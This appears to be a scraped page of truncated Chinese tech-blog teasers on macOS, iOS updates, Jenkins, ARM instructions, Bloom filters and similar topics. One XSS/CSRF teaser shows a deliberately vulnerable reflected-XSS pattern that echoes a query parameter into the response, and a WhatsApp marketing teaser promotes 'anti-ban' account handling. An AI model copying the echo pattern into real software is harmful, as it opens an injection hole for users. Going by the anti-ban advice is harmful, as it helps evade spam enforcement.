引言 本文是系列的开篇&#xff0c;我将为大家介绍MacOS的基本操作。对于初次接触MacOS的用户来说&#xff0c;掌握这些基本操作是必不可少的。无论是启动和关机&#xff0c;还是使用键盘和鼠标&#xff0c;或者是快捷键的使用&#xff0c;这些基本操作都是你开始使用MacOS的第…

微信小程序开发缺少中间证书问题(腾讯云、阿里云等做服务器)

项目使用nginx做负载均衡后&#xff0c;不再采用原来直接用jar包的方式直接开启对应端口&#xff0c;所以需要重新从云服务器上下载证书&#xff0c;写入到Nginx读取的证书路径上即可。

XSS CSRF

XSS & CSRF xss&#xff1a;跨站脚本攻击&#xff1a;注入一些非法的脚本 csrf&#xff1a;冒充身份 XSS 反射型 /welcome&#xff1a;res.send(req.query.type) 输入什么就输出什么&#xff08;httpOnly:false&#xff0c;但不是解决方案&#xff09; 比如&#xff1a;?&…

iPhone升级iOS17出现无法连接互联网的错误提示怎么办?

最新的iOS 17系统已经发布了快一个月了&#xff0c;很多人都已升级体验更多全新功能&#xff0c;但有部分用户却在升级过程中遇到一些问题&#xff1a;如无法验证更新&#xff0c;iOS17验证失败&#xff0c;因为您不再连接到互联网、 iPhone无法检查更新等错误问题。明明网络稳…

轻量级接口自动化测试框架

大致思路: jmeter完成接口脚本,Ant完成脚本执行并收集结果生成报告,最后利用jenkins完成脚本的自动集成运行. 环境安装: 1.jdk1.7 配置环境变量(参考前面的分页) 2.jmeter解压到本地,ant解压到本地 3.Ant解压到本地,并配置环境变量 ANT_HOME:D:\jmeter\apache-ant-1.9.6 P…

助力电力行业数字化转型:智慧风电项目介绍

智慧电力作为电力领域的突破性进展&#xff0c;旨在实现能源领域的数字化转型。智慧电力借助数字孪生、IOT、云计算等技术&#xff0c;将传统的电力系统升级为高智能、高效能的系统&#xff0c;助力传统能源企业实现数字化转型。下面让我们来看一看山海鲸可视化提供的智慧电力相…

C# GraphicsPath 类学习

先在窗体放2个picturebox&#xff0c; 然后看一下如下代码&#xff1b; using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; us…

物流仓储RFID系统设计案例分享

一、项目背景 为了实现仓储货物管理数字化转型的目标&#xff0c;提升仓储业务自动化和数字化水平&#xff0c;在满足仓储日常需求的基础上&#xff0c;验证物联网和人工智能相关技术能力&#xff0c;为仓储业务的柔性自动化、快速部署和复制提供储备能力。 项目设计目标包括…

2023/9/28 -- ARM

【内存读写指令】 int *p0X12345678 *p100;//向内存中写入数据 int a *p;//从内存读取 1.单寄存器内存读写指令 1.1 指令码以及功能 向内存中写&#xff1a; str:向内存中写一个字(4字节)的数据 strh:向内存写半个字&#xff08;2字节&#xff09;的数据 strb:向内存写一个字…

布隆过滤器及其用法

1 定义 布隆过滤器(Bloom Filter, BF)是由Howrad Bloom在1970年提出的一种具有高效时间和空间效率的二进制向量数据结构&#xff0c;用来检测一个元素是不是属于这个集合。注意&#xff0c;布隆过滤器只判断是否出现在集合中&#xff0c;无法给出元素在集合中的具体位置。 1.1…

HubSpot成功全靠它?集客营销大揭秘

在当今数字化的商业世界中&#xff0c;吸引、转化和维护客户已经变得更具挑战性和复杂性。然而&#xff0c;有一家公司已经成功地帮助数千家企业实现了集客营销的成功。这家公司就是HubSpot。那么&#xff0c;HubSpot的成功到底全靠了什么&#xff1f;让我们揭开集客营销的大秘…

openGauss学习笔记-92 openGauss 数据库管理-内存优化表MOT管理-内存表特性-使用MOT-MOT使用MOT SQL覆盖和限制

文章目录 openGauss学习笔记-92 openGauss 数据库管理-内存优化表MOT管理-内存表特性-使用MOT-MOT使用MOT SQL覆盖和限制92.1 不支持的特性92.2 MOT限制92.3 不支持的DDL操作92.4 不支持的数据类型92.5 不支持的索引DDL和索引92.6 不支持的DML92.7 不支持的JIT功能&#xff08;…

3D孪生场景搭建:3D漫游

上一篇 文章介绍了如何使用 NSDT 编辑器 制作模拟仿真应用场景&#xff0c;今天这篇文章将介绍如何使用NSDT 编辑器 设置3D漫游。 1、什么是3D漫游 3D漫游是指基于3D技术&#xff0c;将用户带入一个虚拟的三维环境中&#xff0c;通过交互式的手段&#xff0c;让用户可以自由地…

前端作业(17)

之后的20个作业&#xff0c;学自【20个JavaScript经典案例-哔哩哔哩】 https://b23.tv/kVj1P5f 支付倒计时 1. 支付10s倒计时 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta http-equiv"X-UA-Compat…

跨境必备!WhatsApp营销——注册、养号、防封号!

前面的文章&#xff0c;我们给大家介绍了WhatsApp营销的定义以及重要性&#xff0c;相信许多跨境小伙伴已经摩拳擦掌&#xff0c;迫不及待讲WhatsApp纳入您的全渠道营销策略。当然&#xff0c;工欲善其事&#xff0c;必先利其器&#xff0c;拥有安全的WhatsApp号与登录环境会让…

【网络安全 --- kali2022安装】kali2022 超详细的安装教程(提供镜像)

如果你还没有安装vmware 虚拟机&#xff0c;请参考下面博客安装 【网络安全 --- 工具安装】VMware 16.0 详细安装过程&#xff08;提供资源&#xff09;-CSDN博客【网络安全 --- 工具安装】VMware 16.0 详细安装过程&#xff08;提供资源&#xff09;https://blog.csdn.net/m0…

Cocos Creator3.8 项目实战(四)巧用九宫格图像拉伸

一、为什么要使用九宫格图像拉伸 相信做过前端的同学都知道&#xff0c;ui &#xff08;图片&#xff09;资源对包体大小和内存都有非常直接的影响。 通常ui 资源都是图片&#xff0c;也是最占资源量的资源类型&#xff0c;游戏中的ui 资源还是人机交互的最重要的部分&#xff…

解决 Jenkins 性能缓慢的问题~转

解决 Jenkins 性能缓慢的问题 Docker中文社区 ​​ 计算机技术与软件专业技术资格持证人 2 人赞同了该文章 没有什么比缓慢的持续集成系统更令人沮丧的了。它减慢了反馈循环并阻止代码快速投入生产。虽然像使用性能更好的服务器可以为您争取时间&#xff0c;但您最终必须投资…

UG\NX CAM二次开发 获取当前加工导航器选中的对象数量和tag UF_UI_ONT_ask_selected_nodes

文章作者:代工 来源网站:NX CAM二次开发专栏 简介: UG\NX CAM二次开发 获取当前加工导航器选中的对象数量和tag UF_UI_ONT_ask_selected_nodes 效果: 代码: void MyClass::do_it() {//获取当前加工导航器选中的对象数量和TAGint count = 0;tag_t* objects = NULL…